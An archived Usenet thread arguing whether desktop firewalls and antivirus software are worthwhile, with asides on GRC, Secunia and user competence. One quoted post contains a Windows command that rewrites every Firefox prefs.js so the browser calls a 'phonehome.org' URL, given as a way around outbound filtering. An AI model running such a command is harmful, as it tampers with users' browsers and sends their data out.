updates of programs is the rage, and I always turn ALL that off.
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> Super Lemon wrote:
>
>> Juergen Nieveler wrote:
>>> Super Lemon
>>>
>>>> Xp fw only protects you from incoming packets.
>>> Just like any other software packet filter running on the same machine.
>>>
>>> If the malware is active on your machine, it can deactivate any
>>> "Desktop Firewall".
>> No question malware can do to a firewall what it can do to an Anti-Vius.
>>
>> Do you keep your door unlocked because the system can be subverted?
>
> Why should someone intentionally unlock his door?
They just might want to use the gateway to get to the outside.
But I guess you could use the door as a door-stop instead.
> Why do you compare a
> system without additional (bogus) stuff with an unlocked door?
Have you ever heard the term "locked-down"? Does that term imply an analogy to
you? I was only extending the implied analogy.
Whether or not that additional stuff is bogus or not hasn't been established
yet. Actually I think it has-- there is no question in my mind that there is a
reason. Therefore the stuff isn't bogus. But I'll concede that not everyone
agrees with me.
freesailor wrote:
> Juergen Nieveler wrote:
>> Super Lemon
>>
>>> Xp fw only protects you from incoming packets.
>> Just like any other software packet filter running on the same machine.
>>
>> If the malware is active on your machine, it can deactivate any
>> "Desktop Firewall".
>
> Sorry, all this "outgoing traffic checking with desktop firewalls is
> useless or detrimental" is *plain bullshit*.
>
> Yes, a *well written* malware already installed on the PC *COULD*
> deactivate any desktop firewall, but by not using such a firewall you
> open the door even to *simpler malware written by kids* ...
>
> That objection excepted against desktop firewalls applies exactly to
> antivirus software, too.
> The "strange" thing is that nobody goes around blabbing about
> "antivirus software is useless"! :-D
Don't underestimate stupidity.
I know of some very comp savvy people who refuses to run with any anti-anything
and claim to never had an infection of any kind. Ok, if you say so. But I think
it is foolish for them to suggest that others can safely surf with only common
sense and safe-hex ideas.
> Admitting that a well-written malicious application could circumvent
> security software is no excuse for taking any care at all (yes, there
> is the additional "false sense of security" bullshit, when the
> expression is inappropriately used ...).
FUD flows in both directions unfortunately.
> Moreover, using a (real) desktop firewall allows you to be alerted when
> not-malware applications try to connect with outside, letting you the
> option to deny this (you can think at many circumstances for it, some
> legitimate, some much less but ...).
> My advice: turn off the much-limited Windows XP SP2 firewall and
> install a good desktop firewall.
In certain circumstance yes. But it is better than nothing.
> ZoneAlarm is quite easy to configure and use and in recent releases I
> haven't found any incompatibility with any other software nor any
> detectable loss in performances.
The earlier versions frustrated some because of all the "useless" alerts they
would get.
> Maybe other desktop firewalls, like Kerio or Sygate, could be as much
> as good or even better.
>
> freesailor
>
Sebastian Gottschalk wrote:
> Todd H. wrote:
>
>>>> Yes, a *well written* malware already installed on the PC *COULD*
>>>> deactivate any desktop firewall, but by not using such a firewall you
>>>> open the door even to *simpler malware written by kids* ...
>>> Now you're really showing what's really plain bullshit.
>
> Were you referring to this as well? If so, you should reconsider your
> statement seriously.
>
>>>> The "strange" thing is that nobody goes around blabbing about
>>>> "antivirus software is useless"! :-D
>>> Oh, I do.
>> Which tells you pretty much all you need to know about how heavily to
>> weigh Sebastian's views when it comes to managaging risk on a home or
>> business PC that lacks a user of utmost care and paranoia.
>
> Eh, no. You really don't need much care to NOT execute a program, to NOT
> use a feature or to NOT trust some random stranger.
Without every executing anything or to never use anything the computer shouldn't
even be purchased. Maybe the key is to know where trust lies instead of blindly
trusting or not trusting others.
To someone who will click every link possible knowing what to NOT click is a
difficult task. Over trust seems installed by ... seems to be a major downfall
since no security written in the TCP/IP suite. If it was a difficult task for
the ARPANET team, it is probably even more so for most people who use a computer.
>
> With my experience, a virus scanner is just good for telling you "uh, oh,
> this special system program can be abused as well. Thus, I call it
> riskware.", spotting false positives (no, WTF, RealPlayer did not become
> malicious over tonight, and definitely did not get changed while still
> having the same SHA1 checksum) and of course, fucking up the system
> (scanning through a big file that it already scanned 5 minutes ago, not
> working with SMTP-TLS and POP3-SSL, ruining HTTP pipelining...). And
> telling me the obvious (the file crack.exe inside the archive "My favorite
> album.MP3.192.zip" is malware, for sure!).
So you make your decisions based on file names? Smart move!
> I fail to see any need if the user just behaves reasonable.
What if "reasonably" is a rare commodity that few have?
> And you know, malware generally slips by. For incompetent users, virus
> scanners usually just shift the time till first infection a little bit.
Depends on whether it is caught by an on-demand or resident scanner.
>> Or Openbsd.
>
> I'm running FreeBSD. With Xgl and fat GNOME. And the last lines of my ipfw
> ruleset are: allow tcp,udp,esp,ah from any to any; deny ip from any to any
> (icmp with some specific types was allowed earlier)
What about a Java program that can subvert the Sun JVM?
Sebastian Gottschalk wrote:
> Barry Margolin wrote:
>
>> In article
>> Juergen Nieveler
>>
>>> Super Lemon
>>>
>>>> Xp fw only protects you from incoming packets.
>>> Just like any other software packet filter running on the same machine.
>>>
>>> If the malware is active on your machine, it can deactivate any
>>> "Desktop Firewall".
>> And burglars can pick locks, so there's no point in locking your door.
>
> Wrong conclusion. The real one:
> Since locks on your door are trivially picked, you should not take locking
> your door as a security measure. Deposit your values in a safe!
So your safe doesn't have a lock on it? How thick are the walls on your safe?
Are they heat resistant? Does anybody have unnecessary access to the contents of
the safe? Does anybody have unnecessary access to the safe itself?
>
> A locked door is merely a sign "I don't want you to enter my house without
> permission." and only keeps of casual introducers (those with no
> lock-picking tools/experience). Basically, this is because your insurance
> company demands it for providing your house insurance. I just wonder...
> hasn't the fence around your plot of land the same purpose?
Since casual intruders are the majority of the perps out there, cutting them out
is not a bad idea. Someone good enough and with enough motivation will
anticipate your security measures and break in no matter what you do.
>
> Beside that, there is no analogon to lock-pciking for the digital world.
> Security against a certain scenario is purely binary there, there is no
> equivalent to a nuclear bomb which opens everything.
Are you saying that the digital world has no connection with the physical world
it is in?
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> Super Lemon wrote:
>
> Waste of resources, and makes the computer more vulnerable.
>
>
>> use Steve Gibson's various tools to turn-off insecure features in Windows
>> http://www.grc.com/freepopular.htm
>
> Or surf to http://grcsucks.com to read more about this clown and how
> useless his tools are.
Amazing how the presence of an arrogant nemesis really boasts someones image.
I thought he was human with common flaws. When every step someone takes is
debunked with such enthusiasm, the "debunker" is putting someone on the same
level as God.
>
>> 6. keep up-to-date with what's out there
>> grc.com (their newsgoups are great)
>
> There are no newsgroups. And nothing is great there.
Ok.
I guess all those postings I've been reading are ghosts.
>
>> secunia.com
>
> Oh... does anyone know a more outdated security-related website?
What is the basis for this comment?
Other than yourself, what source of information do suggest?
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> freesailor wrote:
>
>> Sebastian Gottschalk wrote:
>>> freesailor wrote:
>>>> Read just my comment above.
>>>> If you really know reald-world scenarios you will be able to debunk
>>>> them.
>>> You failed to show me any such scenario.
>> Since this seems to be your desperate line of defense, I'll just cite
>> you a few words:
>> - enterprise (usually Windows) environment
>> - not well-timed security updates
>
> This is where your arguments already fails. A "desktop firewall" can't
> protect against vulnerable software.
Where did someone say it could?
>
>> - not skilled and/or "controlled" users
>> - no system-level application manager
>
> What a nonsense. This is not even a problem, this is a good thing since
> it's the absence of a superfluos software.
So you're saying that unskilled users are not a problem?
Everybody I know that does computer repair would disagree with you.
>>> I really wonder, since running a
>>> Windows box safely really isn't anything special or mysterious.
>> Oh, yes, for you and me at home ...
>
> Not just there.
You still seem to be ignoring the majority of users.
>
>> No, my suggestion is just: using security software is better than using
>> no security software, 999 times on 1000, especially if you are not so
>> skilled in security.
>
> And you fail to qualify this obviously bogus claim.
How can it be "obvious" when it is hidden from so many others.
How can we accept it is "bogus" when we are trying to establish what is and what
isn't bogus.
>
>> BTW, did I mention that desktop firewalls, antivirus and similar
>> software can check for email malicious attachments, in some cases
>> directly renaming "dangerous extensions", so preventing users mistaken
>> clicks?
>
> Since when does opening an email attachment execute any programs?
Let's see, the attachment might be a java applet, an active-X control, or HTML
code with Javascript embedded. There are others but these are a few of the
possible vectors.
> Since when would a sane user execute such programs?
Have you ever heard of an accident?
> when would a sane user execute such programs? Which sane administrator
> Which sane administrator would allow his users to run any programs?
What about a SOHO network that has no administer?
What about a stand alone node?
>
> Beside that, this functionality normally doesn't work at all. Usually
> because all this software provides is a POP3/SMTP proxy which doesn't know
> SSL/TLS and plugins for just exactly the trivially vulnerable
> Outlook/Express no-one would ever use.
Funny, I know a few that do.
>> The real world said that users misbehaving with email attachments is
>> one of the more usual way to spread visuses an malware, so tha real
>> world is saying (again) that you are plainly WRONG ...
>
> The real world tells that beside a large deployment of such pseudo-security
> software, essentially nothing has changed at all. The exponential grow of
> malware didn't even flatten in just a noticeable way... And so, the
> software has obviously failed.
So what do you think will succeed?
Since common-sense has been around longer than AV's they have failed also. So
let's abandon them!
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk wrote:
> Super Lemon wrote:
>
>> Sebastian Gottschalk wrote:
>>> Todd H. wrote:
>>>
>>>>>> Yes, a *well written* malware already installed on the PC *COULD*
>>>>>> deactivate any desktop firewall, but by not using such a firewall
>>>>>> you open the door even to *simpler malware written by kids* ...
>>>>> Now you're really showing what's really plain bullshit.
>>> Were you referring to this as well? If so, you should reconsider your
>>> statement seriously.
>>>
>>>>>> The "strange" thing is that nobody goes around blabbing about
>>>>>> "antivirus software is useless"! :-D
>>>>> Oh, I do.
>>>> Which tells you pretty much all you need to know about how heavily to
>>>> weigh Sebastian's views when it comes to managaging risk on a home or
>>>> business PC that lacks a user of utmost care and paranoia.
>>> Eh, no. You really don't need much care to NOT execute a program, to
>>> NOT use a feature or to NOT trust some random stranger.
>> Without every executing anything or to never use anything the computer
>> shouldn't even be purchased. Maybe the key is to know where trust lies
>> instead of blindly trusting or not trusting others.
>
> Ah, you finally got the point. Indeed, there's absolutely nothing that
> could replace the implications of estimating trust.
When it comes to deciding the level of security to be taken, consciously
deciding your level of trust is necessary. I trust all s/w authors to be human
and therefore I never trust a program to be perfect. I see nothing wrong with
using a layered defense to catch something that passes by another layer.
>
>> To someone who will click every link possible knowing what to NOT click
>> is a difficult task. Over trust seems installed by ... seems to be a
>> major downfall
>
> Indeed. The problem is PEBKAC, and it makes all the PFWs' and
> virusscanners' security efforts worthless until addressed.
I doubt if human flaws will be corrected anytime soon. But I do hear VISTAs SP98
will address the human firewall and the holes in necessary wetware.
>> since no security written in the TCP/IP suite. If it was
>> a difficult task for the ARPANET team, it is probably even more so for
>> most people who use a computer.
>
> Nonsense. Do you know the ISO/OSI model? Now point at the layers which are
> to provide routing and connection abstraction, and which one is to provide
> security.
If I remember correctly I'm basing that statement on Eric Raymond's "Art of Unix
Programming".
Are you speaking of SSL which was added many years later?
Are you talking about the possibility of encryption at the presentation level?
> Beside that, ARPANET had different boundary criteria. Some which might not
> hold for its current state of development.
>
>
> And users failing to understand the home computer as a highly complex
> universal machine which must be well administrated when being
> interconnected with a big network is purely ignorance.
>
>>> And telling me the obvious (the file crack.exe inside
>>> the archive "My favorite album.MP3.192.zip" is malware, for sure!).
>> So you make your decisions based on file names? Smart move!
>
> Filenames are generally an index criteria. Thus they're supposed to be a
> decision base, but not be relied on. If the content actually matches the
> criteria can only be decided after actually aqquiring that content.
>
>>> I fail to see any need if the user just behaves reasonable.
>> What if "reasonably" is a rare commodity that few have?
>
> Then those people should pay someone for administrating their computer. Or
> get some easy-to-use ones, like a MacMini running Mac OSX. Unless then,
> they should rather stick to a Gameboy.
I guess that would guarantee work for the likes of you and me.
>
> And I think that legislation should support demanding a minimal state of
> knowledge and administration for running computers. Same as cars.
For (at least) the last 4 decades, Cars have been regulated and a minimal state
of knowledge and skill is tested. Doesn't work very well.
People still don't know basic maintenance or intermediate mechanics like how to
change their valve-cover-gasket.
People still don't seem to understand that a brake can be dangerous (when used
incorrectly).
So let's quit worrying about the false security created by outlawing
cell-phones. We need to focus on banning the use of potentially dangerous
mechanisms like brakes. 8^)
>>> And you know, malware generally slips by. For incompetent users, virus
>>> scanners usually just shift the time till first infection a little bit.
>> Depends on whether it is caught by an on-demand or resident scanner.
>
> In case of incompetent users you should always assume that only on-access
> scanners are meant. After all, they're too stupid to invoke on-demand
> scanning when required.
We are all "stupid" in some arena. Don't be so harsh to others where you're
competent. You just might meet some of those same people when they have the
upper hand.
>
>>> I'm running FreeBSD. With Xgl and fat GNOME. And the last lines of my
>>> ipfw ruleset are: allow tcp,udp,esp,ah from any to any; deny ip from
>>> any to any (icmp with some specific types was allowed earlier)
>> What about a Java program that can subvert the Sun JVM?
>
> I have the Java VM in my webbrowser deactivated by default. After all,
> you'll rarely if never need it.
That is becoming truer than it was in the recent past.
>
> But indeed, when was the latest 0day exploit for the Sun Java VM (thus a
> vulnerability becoming known that hasn't already been fixed in the latest
> versions)? According to my documentation (and I'm really deep into the
> security of Java) as well as CVE, this was... eh... 1.4.0.02? Has been 44
> updates and more than two years since then.
Probably not as many as MS's JVM but many don't know the difference.
Sebastian Gottschalk wrote:
> Super Lemon wrote:
>
>> Sebastian Gottschalk wrote:
>>> Super Lemon wrote:
>>>
>>> Waste of resources, and makes the computer more vulnerable.
>>>
>>>> use Steve Gibson's various tools to turn-off insecure features in Windows
>>>> http://www.grc.com/freepopular.htm
>>> Or surf to http://grcsucks.com to read more about this clown and how
>>> useless his tools are.
>> Amazing how the presence of an arrogant nemesis really boasts someones image.
>> I thought he was human with common flaws. When every step someone takes is
>> debunked with such enthusiasm, the "debunker" is putting someone on the same
>> level as God.
>
> What's your argument here? You should seriously read this website, since it
> provides competent technical arguments by serious experts on how bad GRC
> actually is. "common flaws" my ass!, the GRC website is full of technical
> bullshit, whether you like it or not. The tools he provides are
> half-functional at best, but usually non-working and misguiding.
I did years ago. What I saw was someone grandstanding to complain about someone
elses grandstanding. Any technical details were obscured by babble around it. If
it was as bad as ... said it was then I doubt that debates would be allowed.
There are several people there that seem to agree with your feelings about PFWs
so you might try it out yourself.
>
>>>> 6. keep up-to-date with what's out there
>>>> grc.com (their newsgoups are great)
>>> There are no newsgroups. And nothing is great there.
>> Ok.
>> I guess all those postings I've been reading are ghosts.
>
> Postings don't make a newsgroup. Utilizing the NNTP protocol and the News
> Message format to provide a thread-bases discussion medium does.
>
Sounds like you are confusing the HTML interface with the NNTP interface
(news.grc.com). I've only used the HTML interface when I was in the field and
wanted to look-up something.
> The nonsense on grc.com is a web forum and nothing else. Might GRC or you
> claim it as a newsgroup won't change that.
If that was true, why does it take an NNTP reader to use it? Many use Gravity
but I use Thunderbird.
>
>>>> secunia.com
>>> Oh... does anyone know a more outdated security-related website?
>> What is the basis for this comment?
>
> Beside the obvious outdateness? Just compare the bug history of some
> entries for various software products with the same at CVE. Not just that
> various years-old already patched vulnerabilities are still mentioned as
> unpatched, they even still listen seeming vulnerabilites which have
> extensively discussed to actually be none (see the Cookies Domain Security
> vs. Domain-Split Setup vs RC1918 discussion on Mozilla/Firefox). And, for
> the best, the same pseudo-vulnerability is listed twice and counted twice.
Let's see. I just went there and saw three "highlights" (1 hour old, 6 days old,
and 13 days old). Then there are 34 "advisories" of todays vulnerabilities. That
don't sound too old to me. Having old articles available never hurts since
people are always falling for old and forgotten techniques. Just like VISTA's
TCP/IP stack being vulnerable to the LAND attack.
I mentioned secunia because they have been getting press lately, they are being
quoted by those I trust (packet storm), and have been helpful in many exploits
of the past (GDI+ was the first time I noticed secunia).
>> Other than yourself, what source of information do suggest?
>
> SecurityFocus, lc0x, FR-SIRT and especially STFW, since many known
> vulnerabilities are not listed on any big site (but doesn't make them
> non-existent).
I like SecurityFocus. I'm not familiar with the others so I'll have to visit
them myself.
freesailor
> Yes, a *well written* malware already installed on the PC *COULD*
> deactivate any desktop firewall, but by not using such a firewall you
> open the door even to *simpler malware written by kids* ...
Unfortunately it took me minutes to f*ck up all "Personal Firewalls" on
the market. This *is* "by kids" niveau.
But even if this would work at all: it's a b0rken concept. It's useless,
because trying to control malware is a useless approach, because you
already lost in the premise - you're assumpting, that your box already
is 0wned then.
It's also counterproductive in most cases, because you're disrupting
online software updates and opening doors to attackers because of
misinterpreted popups by the person, who should be protected and not be
responsible for protection: the user.
Or to be clear: "controlling outbound" is the typical advertizing lie
constructed by people who want to continue to sell their host based
packet filter implementations in spite of the fact, that Windows at
least since Windows XP SP2 has a good implementation ex factory.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
freesailor
> I fully agree with you that user's behaviour is the most important line
> of defense against viruses and malware
If you would do so, then you couldn't argue for having popups with
technical questions which are asked the user by these ridiculous
"controlling outbound" implementations, and giving him all
responsibility for security on the machine.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
freesailor
> Since this seems to be your desperate line of defense, I'll just cite
> you a few words:
> - enterprise (usually Windows) environment
OK.
> - not well-timed security updates
Better improve that.
> - not skilled and/or "controlled" users
Clear.
> You have A LOT of similar situations in real world, and in any case, a
> personal firewall is useful, not harmful.
I never was told of one, with one exception: here in this group, a
person liked Sygate not as "Personal Firewall" but as network analysis
tool because of the logging functionality.
> I hope I'll not have to explain more ...
You could give one single example of a useful feature which is security
related. You would be the very first person who manages to do so.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Super Lemon
> Don't underestimate stupidity.
Being confronted with this "Personal Firewall" nonsense again, don't
worry ;-)
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> | for /r %i in (prefs.js) do echo user_pref("browser.startup.homepage",
> | "http://phonehome.org?personalinformation=%DATE%%TIME%");>>" %i"
> And then just wait until the user starts up Mozilla/Firefox.
> Which is even more obvious since it doesn't involve any IPC at all.
It does - IPC via files or the registry, respectively.
I already had this idea, too: did you test this on Vista and Internet
Exporer 7?
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> > It does - IPC via files or the registry, respectively.
> The P in IPC refers to "process" and the "C" refers to communication.
> Writing to a configuration of other programs doesn't involve such a thing.
It does. The writing process communicates to the process, which uses the
configuration.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
In article
Juergen Nieveler
> Barry Margolin
>
> >> > Xp fw only protects you from incoming packets.
> >>
> >> Just like any other software packet filter running on the same machine.
> >>
> >> If the malware is active on your machine, it can deactivate any
> >> "Desktop Firewall".
> >
> > And burglars can pick locks, so there's no point in locking your door.
>
> You lock your door to prevent a burglar from getting out?
That's irrelevant to the point I was addressing. His claim was that
software firewalls are useless because they can be defeated by the
malware they're supposed to be protecting against. My analogy is that
door locks can be defeated by the burglars they're supposed to protect
against, but that doesn't make them useless.
In another response, someone pointed out that you don't depend solely on
door locks if you have very valuable items. I can understand that --
multiple lines of defense are a good idea. But how does that imply that
you should NOT use a software firewall? It's simply another line of
defense.
HOWEVER, my personal experience has been that outgoing checks tend to be
more annoying than protective. I've frequently had problems using
ordinary applications like Yahoo! Messenger, which turned out to be a
software firewall blocking connections. I can't recall ever having my
firewall pop up an alert about something trying to make an outgoing
connection, and deciding to block it. BUT, I've mostly only used
Windows in well-protected, corporate environments (my home computers
have always been Macs), and I don't visit lots of random web sites that
are likely to try to infect my computer. AFAIK, I've never had a virus
on a computer I've used, so I've gotten complacent about this.
--
Barry Margolin, barmar@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
*** PLEASE don't copy me on replies, I'll read them in the group ***
Post removed (X-No-Archive: yes)
In article <51mqlsF1klv6rU1@mid.dfncis.de>,
Sebastian Gottschalk
> I fail to see any need if the user just behaves reasonable.
That's a pretty big "if" there. Do you also fail to see a need for
developing a cure for AIDS, as there wouldn't be any need if sexually
active people just "behave reasonably"?
The simple fact is that typical computer users DO do all the things that
allow their computers to become infected, and they're not going to learn
better any time soon. So the best we can do is install the computer
equivalent of a condom.
--
Barry Margolin, barmar@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
*** PLEASE don't copy me on replies, I'll read them in the group ***
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
> OK, maybe I should put your focus on the "I" which stands for "inter".
> Which implies that the communicating process are running at the same time
> for interchanging data.
It does not.
> So please, do not twist programs and processes.
I don't.
> Processes are an instance
> of a running activity inside a program's code in memory.
I would prefer to distinguish between processes and threads by defining
processes as protected memory region with at least one thread in it.
Yours,
VB.
--
"Pornography is an abstract phenomenon. It cannot exist without a medium
to propagate it, and it has very little (if anything at all) to do with sex."
Tina Lorenz
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
news:51og5cF1k8350U1@mid.dfncis.de:
> DanS wrote:
>
>>> Since when does opening an email attachment execute any programs?
>>> Since when would a sane user execute such programs? Which sane
>>> administrator would allow his users to run any programs?
>>
>> Well, let's see, OE used to automatically execute HTML contnet when
>> e-mail was viewed in the preview pane. (I would think that was fixed
>> by now.)
>
> Abusing Outlook Express as a newsreader is PEBKAC.
Regardless of what PEBKAC means, using OE as a newsreader was NEVER
mentioned at any point in time, only from e-mail, which is EXACTLY what I
stated above.
And what do probably 50% of POP3 e-mail users use......OE.
DanS
> Sebastian Gottschalk
> news:51og5cF1k8350U1@mid.dfncis.de:
>
> > DanS wrote:
> >
> >>> Since when does opening an email attachment execute any programs?
> >>> Since when would a sane user execute such programs? Which sane
> >>> administrator would allow his users to run any programs?
> >>
> >> Well, let's see, OE used to automatically execute HTML contnet when
> >> e-mail was viewed in the preview pane. (I would think that was fixed
> >> by now.)
> >
> > Abusing Outlook Express as a newsreader is PEBKAC.
>
> Regardless of what PEBKAC means,
problem exists between keyboard and chair.
--
Todd H.
http://www.toddh.net/
Post removed (X-No-Archive: yes)
Sebastian Gottschalk
news:51ogtgF1kredoU1@mid.dfncis.de:
> DanS wrote:
>
>>>> Well, yes, because you're not running windows.
>>>
>>> This is especially true for Windows, since all those "desktop
>>> firewalls" for Windows are totally broken.
>>
>> I don't know why you keep saying that.
>>
>> Maybe you're like my son, who choked on a taco shell when he was 3.
>> To this day, he'll be 18 in Feb., he won't eat hard shell tacos.
>>
>> Maybe you had one bad experience with ZoneAlarm v1.0, or something
>> similar, eons ago and can not accept that anyhting may have fixed.
>
> No. I'm regularly appointed fixing computers for home users, thus I
> generally all this buzz stuff in most recent version.
And I am tech support for many people also.
> And my
> experience that they're all totally broken.
>
> Just the recent example: Computer A could ping Computer B, but not
> counterwise. Computer A had ZoneAlarm running. The user told he
> already deactivated ZoneAlarm, but it still didn't work. I advised him
> to *uninstall* it, and, who wonders, then it worked. Ouch!
>
> Not to mention that you can't even refer to TCP states or provide a
> REJECT action makes them all unsuitable in reasonable way...
>
>> So v1.0 8 yrs ago messed up something in your little Win98 box....boo
>> hoo hoo. Get over it.
>
> I never had any DOS-based OS running, and neither any PFW (except in a
> test machine to collect obvious facts about its nonsensicalness).
>
So what you are saying, is that you have never run a PFW in a
'production' machine that is utilized everyday by all members of the
family doing whatever each person does ?
Doesn't sound like you can come up with any good data/conclusions like
that. I can run a whole load of wireless data equipment (not 802.11x)
from different manufactures on the bench, but then deploy them and come
up with completely different results.
>>>>> But please, just state how such "simpler malware" could
>>>>> successfully exploited a fully patched Windows XP SP2 in standard
>>>>> configuration.
>>>>
>>>> Oh, how bout the day after the next 0day exploit is released for
>>>> it, and before the update cycle?
>>>
>>> A 0day exploit for what program or subsystem?
>>
>> It doesn't matter what OS. The O/S in question is Windows XP.
>
> I haven't been asking for the OS. I have been asking for the specific
> program or subsystem.
It doesn't matter what program or subsystem, because you don't know what
will be the subject of the next 0-day exploit.
>> 2) What was the file xxxxx.xxxx.crack.exe doing in a zip file you
>> had.
>
> A hypothetical download from a P2P download.
>
>> According to you, you would not ever trust any program you had not
>> written (it seems), and I think any program named crack.exe would be
>> something not written by you, and should NOT on your computer.
So there was a false-positive on a file inside a zip file that you
'hypothetically' d/l'd from a P2P network. So what is a 'hypothetical
download' ?
> Indeed. I would never except a program in a ZIP archive that's
> supposed to only contain data. And especially P2P with download
> information not directly provided by a vendor is an untrustworthy
> source.
I guess the biggest question here is why are you using a P2P program ?
> Such a program getting on your computer, however, is nothing special.
> Just look inside your browser cache, you'll find a lot.
Sorry, no browser cache, it's cleared at closing down FF.
>
>> 3) How can you say that programs don't try to 'call home'. Automatic
>> updates of programs is the rage, and I always turn ALL that off.
>
> 'Call home' in the usually negative way implies that such a behaviour
> cannot be easily disabled by the configuration dialogues that the
> program provides, that the meaning of the configuration option isn't
> obvious or at least documented, or the deactivation doesn't work as
> supposed.
>
> If you can disable it, there's no malicious behaviour to complain
> about and especially no need to block anything (since you should
> rather disable it, which is way easier, more reliable and especially
> doesn't interfere with user-invoked connection attempts).
Automatically updating itself is considered 'calling home' to me.
RealPlayer & Sun Java seem to ALWAYS revert to auto-updating, even after
set to 'Never' auto-update, why, I don't know, possibly because they are
used often.
B. Nice
news:6mtdr2l1n2m3edp619bi1mriecbd184024@4ax.com:
> On Wed, 24 Jan 2007 01:55:44 +0100 (CET), DanS
>
>
>>Sebastian Gottschalk
>>news:51n0g0F1k8uh1U1@mid.dfncis.de:
>>> This is especially true for Windows, since all those "desktop
>>> firewalls" for Windows are totally broken.
>>
>>I don't know why you keep saying that.
>
> If you have a different understanding, feel free to provide your
> opinion.
>
The issue I have is saying ALL of these products are 'broken'.
Is there any proof ? Good data ? As I noted in another post, SG said that
he had NEVER run a DOS-based box, and also NEVER used a PFW on any
machine other than a test machine.
What were the results on the test machine ? Was there benchmark testing
done before and immediately after PFW installation ? How many were tesed
by him, using the exact same procedure ? Was the test PC purposely
infected with spyware to see how the PFW would react ? Was there an
extended test for a period of time with different users and different use
habits ? Which ones very easiest to install and configure ? Which were
easiest/hardest to un-install ? And so on...
What Seb. holds is an opinion. Because it is a strong opinion does not
mean it is right, or wrong, just strong.
>>
>>So v1.0 8 yrs ago messed up something in your little Win98 box....boo
>>hoo hoo. Get over it.
>
> I'm sure you're able to argue considerably better than that.
Well, who want's to argue ? Usenet is referred to as being 'discussion
groups', not 'argument groups'.
>
>>3) How can you say that programs don't try to 'call home'. Automatic
>>updates of programs is the rage, and I always turn ALL that off.
>
> If you prefer to go looking for bug fixes yourself, that's your choice
> of course.
Bug fixes for what ? If there is a reason to update, I will. If there is
some problem caused that I run into and an update will fix it, I will
update manually, but other than that, 'if it ain't broken', don't fix it.
Post removed (X-No-Archive: yes)
Post removed (X-No-Archive: yes)
On Jan 23, 9:20 pm, Sebastian Gottschalk
> freesailor wrote:
> >> I simply don't execute any malware. Now, that was easy.
>
> > So, you are every time sure it's not a malware.Yes. And I call this a trivial decision process.
>
> >> Why should it stop something that can't even happen? How should malware get
> >> executed automatically and without my consent? I'm not using any program in
> >> any configuration which would allow such an insanely stupid thing.
Well, this threads has gone so far that I've no time to answers to the
huge bunch of absurdities I've read now.
Also because the guy seems to unable to use his brain.
I'll do a much more opportune thing: I'll explain everyone the
much-confused "Sebastian Gottschalk philosophy". ;-)
Summarizing all your blabbing, what he is suggesting is:
"------------------
Local security software, such as desktop firewalls and antivirus
scanners, is not only useless, but harmful indeed.
In fact:
1) there is a high chance that those tools are easily circumvented by
malware tools
2) there is a high chance that those local security softwares introduce
more security vulnerabilities than they stop
3) besides the technical unfeasibility, there is no real need of
features that are assumed to be able to control internal tasks
behaviour (e.g. filtering outbound traffic, checking for application
integrity)
4) there is a high chance they cause instability to your system
You can avoid using them just by:
5) installing just software you are sure is not malware
6) using intrinsecally more secure operating systems (e.g. various
Linux/Unix flavours)
7) being always extremely careful in daily behaviour, e.g. dealing with
emails attachments
8) use just native security tools, like Windows XP SP2 native firewall:
they are able to satisfy the real needs, without increasing complexity
to the system and vulnerabilities.
------------------"
Those are not good advices, they are silly advices, based on a bunch of
wrong or deceitful assumptions.
1) any software can be compromised, even the OS itself and even
software installed in network security devices like network firewalls.
But the history of known vulnerabilities in local security software
(e.g desktop firewalls like ZoneAlarm) show that they aren't
particularly vulnerable (two vulnerabilities discovered in 2006 for
some versions of ZoneAlarm; for comparison, Cisco PIX firewall has
seven vulnerabilities discovered in 2006!). Moreover, to decrease (not
remove, just decrease ...) the risk of desktop firewall or antivirus
tampering, there is a quite easy way: login in your desktop as a
standard user and not as an administrator, so raising the protection
against programs tampering. This could be a good advice, not the above
bullshit ...
2) given the above mentioned example score, this is a truly ridiculous
statement. In fact, a good desktop firewall (not to mention a good
antivirus) protects effectively your system from *hundreds* of real
threats, in face of very few vulnerabilities. And recent interfaces are
not particularly difficult to manage for the average user (see Zone
Alarm).
3) plain bullshit, again. Desktop firewalls can control, *at least*,
outbound traffic for not-malware application trying to connect to
undesired external sites (in how many cases a fully local program, e.g.
a writing program, should be allowed to reach internet, at least for
privacy reasons?). Moreover, desktop firewalls like ZoneAlarm and
Sygate can check for network local application integrity on execution,
using MD5 signatures, a not trivial and very useful feature.
4) this is a statement that could have been true five or six years ago,
now both desktop firewalls and antivirus usually don't impose any
instability nor performance penalization. So, it seems that who made
that statement stopped using these kind of software many years ago ...
The "remediations" are even more hilarious:
5) this is the most amazing statement (but is the foundation for all
the rest of this bullshit)! What the hell can you be *SURE* that a
piece of software is *NOT* malware, if you haven't its source? Do you
disassemble every executable? Do you consider "trustable" who gave you?
And why? Do you know so well every relevant software maker, directly?
*** ABSOLUTE BULLSHIT *** ...
6) this can be done at home, hardly in corporate environment, where
Windows is ubiquitous. Even at home, this means using a platform having
